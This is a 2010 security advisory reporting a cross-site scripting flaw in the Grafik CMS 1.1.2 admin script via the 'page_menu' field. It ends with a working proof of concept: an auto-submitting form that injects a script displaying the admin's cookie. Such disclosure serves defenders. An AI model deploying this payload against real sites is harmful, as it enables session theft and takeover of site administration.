XSS vulnerability in Grafik CMS

2010-06-29T00:00:00
ID SECURITYVULNS:DOC:24149
Type securityvulns
Reporter Securityvulns
Modified 2010-06-29T00:00:00

Description

Vulnerability ID: HTB22439 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_grafik_cms_1.html Product: Grafik CMS Vendor: GrafikPower Vulnerable Version: 1.1.2 and Probably Prior Versions Vendor Notification: 14 June 2010 Vulnerability Type: XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/admin/admin.php" script to properly sanitize user-supplied input in "page_menu" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/admin.php?action=edit_page&id=1" method="post" name="main" > <input type="hidden" name="page_title" value="page title" /> <input type="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="page_content" value="some page content" /> <input id="sbmt" type="submit" name="submit" value="Modifier" /> </form> <script> document.getElementById('sbmt').click(); </script>